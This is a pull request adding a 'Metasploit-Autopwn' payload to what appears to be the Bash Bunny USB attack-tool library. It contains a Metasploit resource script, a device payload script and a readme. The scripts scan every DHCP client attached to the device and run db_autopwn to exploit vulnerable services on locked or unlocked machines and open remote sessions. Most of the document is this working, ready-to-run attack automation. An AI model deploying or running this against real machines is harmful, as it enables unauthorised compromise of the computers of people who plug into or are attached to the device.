### PR TITLE
Metasploit Autopwn Bash Bunny Payload

### DIFF
--- a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -1,0 +1,34 @@
+# Prequisities:
+# 1. You must have metasploit installation up and running in path /toos/metasploit-framework/
+# 2. One-time fix for adding user "postgres" to the network user groups
+usermod -a -G netdev,systemd-network,net_raw postgres
+
+# Connect to pre-created metasploit database called "postgres"
+db_connect postgres
+load db_autopwn
+
+# This sleep because everytime we load db_autopwn module, metasploit is rebuilding the database cache (need more digging into this to cancel this stage)
+sleep 60
+
+# Purge old data to not to be included in the attack
+hosts -d
+services -d
+
+# Start db_nmap metasploit scanning module (scan all the range except the Bunny itself)
+db_nmap 172.16.64.2-254 -p 21,22,137,139,445 -v 1 -O --reason
+sleep 5
+
+# Show hosts after db_nmap scan
+hosts
+
+# Show services after db_nmap scan
+services
+
+# Initiate db_autopwn metasploit module
+db_autopwn -t -p -r -e -T 120
+
+# Show created metasploit sessions
+sleep 5
+sessions
+# Finish
+sleep 10

--- a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -9,8 +9,8 @@ sleep 60
 hosts -d
 services -d
 
-# Start db_nmap metasploit scanning module (scan all the range except the Bunny itself)
-db_nmap 172.16.64.2-254 -p 21,22,137,139,445 -v 1 -O --reason
+# Start db_nmap metasploit scanning module (scan all the dhcp clients except the Bunny itself, feel free also to include any services port you want to exploit)
+db_nmap 172.16.64.2-254 -p 445 -v 1 -O --reason
 sleep 5
 
 # Show hosts after db_nmap scan

--- a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -20,7 +20,7 @@ hosts
 services
 
 # Initiate db_autopwn metasploit module
-db_autopwn -t -p -r -e -T 120
+db_autopwn -t -p -r -e -T 20
 
 # Show created metasploit sessions
 sleep 5

--- a/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
+++ b/payloads/library/exploitation/Metasploit-Autopwn/auto_pwn.rc
@@ -1,8 +1,3 @@
-# Prequisities:
-# 1. You must have metasploit installation up and running in path /toos/metasploit-framework/
-# 2. One-time fix for adding user "postgres" to the network user groups
-usermod -a -G netdev,systemd-network,net_raw postgres
-
 # Connect to pre-created metasploit database called "postgres"
 db_connect postgres
 load db_autopwn

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -6,5 +6,5 @@ ATTACKMODE RNDIS_ETHERNET
 # date -s "20170830 01:23"
 LED ATTACK
 # For debugging we are writing the whole output into a file in /tools
-/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto-pwn.rc >> /tools/msfAutopwnOUTPUT.txt
+/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto_pwn.rc >> /tools/msfAutopwnOUTPUT.txt
 LED FINISH

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -13,7 +13,8 @@
 # 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
 # 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
 
-#Script 
+# Script
+# LED SETUP................Setting up stuff
 # LED ATTACK...............Running Metasploit Autopwn Module
 # LED FINISH...............Attack Finished
 

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -1,6 +1,25 @@
 #!/bin/bash
-CUCUMBER PLAID
+#
+# Title:         Metasploit-Autopwn
+# Author:        @SymbianSyMoh - Seekurity.com
+# Version:       0.1
+#
+# Runs Metasploit db_autopwn module against the whole dhcp clients conencted
+# to the Bash Bunny device exploiting locked and unlocked machines that running
+# vulnerable OSes or services.
+# Prequisities:
+# 1. Ruby 2.4.1 installed via rbenv (the best to have ruby installed without any problems)
+# 2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+# 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+# 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+#Script 
+# LED ATTACK...............Running Metasploit Autopwn Module
+# LED FINISH...............Attack Finished
+
 LED SETUP
+usermod -a -G netdev,systemd-network,net_raw postgres
+CUCUMBER PLAID
 ATTACKMODE RNDIS_ETHERNET
 # Adjust a nearest date/time
 # date -s "20170830 01:23"

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -4,6 +4,7 @@
 # Author:        Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
 # Version:       0.1
 #
+#
 # Runs Metasploit db_autopwn module against the whole dhcp clients conencted
 # to the Bash Bunny device exploiting locked and unlocked machines that running
 # vulnerable OSes or services.
@@ -19,10 +20,11 @@
 # LED FINISH...............Attack Finished
 
 LED SETUP
+# One-time fix for adding user "postgres" to the network user groups
 usermod -a -G netdev,systemd-network,net_raw postgres
 CUCUMBER PLAID
 ATTACKMODE RNDIS_ETHERNET
-# Adjust a nearest date/time
+# Please adjust a nearest date/time
 # date -s "20170830 01:23"
 LED ATTACK
 # For debugging we are writing the whole output into a file in /tools

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -1,7 +1,7 @@
 #!/bin/bash
 #
 # Title:         Metasploit-Autopwn
-# Author:        @SymbianSyMoh - Seekurity.com
+# Author:        Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
 # Version:       0.1
 #
 # Runs Metasploit db_autopwn module against the whole dhcp clients conencted

--- a/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
+++ b/payloads/library/exploitation/Metasploit-Autopwn/payload.txt
@@ -1,0 +1,10 @@
+#!/bin/bash
+CUCUMBER PLAID
+LED SETUP
+ATTACKMODE RNDIS_ETHERNET
+# Adjust a nearest date/time
+# date -s "20170830 01:23"
+LED ATTACK
+# For debugging we are writing the whole output into a file in /tools
+/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto-pwn.rc >> /tools/msfAutopwnOUTPUT.txt
+LED FINISH

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -6,7 +6,7 @@
 
 ## Description:
 
-Runs Metasploit db_autopwn module against the whole dhcp clients connected to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
+Runs Metasploit db_autopwn module against the dhcp connected client to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
 
 ## Configuration/Prequisities:
 

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -1,0 +1,34 @@
+# Metasploit-Autopwn
+
+* Author: @SymbianSyMoh - Seekurity.com
+* Version: Version 0.1
+* Target: Windows
+
+## Description:
+
+Runs Metasploit db_autopwn module against the whole dhcp clients conencted to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
+
+## Configuration/Prequisities:
+
+1. Ruby 2.4.1 installed via 'rbenv' (the best to have ruby installed without any problems)
+2. You must have metasploit installation up and running in path /toos/metasploit-framework/
+3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
+4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
+
+
+## Notes
+
+This was designed and tested on a Netgear Nighthawk Router, and an Arris Xfinity Modem/Router combo; however
+I don't see why it couldn't be used for any internet connected device that uses basic http authentication.
+And please... Don't feed the bunnies.
+
+## STATUS
+
+| LED                | Status                                         |
+| ------------------ | -----------------------------------------------|
+| Setup              | Setting up stuff                               |
+| ATTACK             | Running Metasploit Autopwn Module              |
+| FINISH             | Attack Finished (hopefully we got some shells) |
+
+## Discussion
+https://forums.hak5.org/topic/41737-metasploit-framework-with-db_autopwn-module-on-bashbunny/

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -1,6 +1,6 @@
 # Metasploit-Autopwn
 
-* Author: @SymbianSyMoh - Seekurity.com
+* Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
 * Version: Version 0.1
 * Target: Windows
 

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -6,7 +6,7 @@
 
 ## Description:
 
-Runs Metasploit db_autopwn module against the whole dhcp clients conencted to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
+Runs Metasploit db_autopwn module against the whole dhcp clients connected to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.
 
 ## Configuration/Prequisities:
 

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -16,11 +16,6 @@ Runs Metasploit db_autopwn module against the whole dhcp clients connected to th
 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
 
 
-## Notes
-
-This was designed and tested on a Netgear Nighthawk Router, and an Arris Xfinity Modem/Router combo; however
-I don't see why it couldn't be used for any internet connected device that uses basic http authentication.
-And please... Don't feed the bunnies.
 
 ## STATUS
 

--- a/payloads/library/exploitation/Metasploit-Autopwn/readme.md
+++ b/payloads/library/exploitation/Metasploit-Autopwn/readme.md
@@ -2,7 +2,7 @@
 
 * Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
 * Version: Version 0.1
-* Target: Windows
+* Target: All OS / services
 
 ## Description:
 


### PR DESCRIPTION
Runs Metasploit db_autopwn module against the whole dhcp clients connected to the Bash Bunny device exploiting locked and unlocked machines that running vulnerable OSes or services.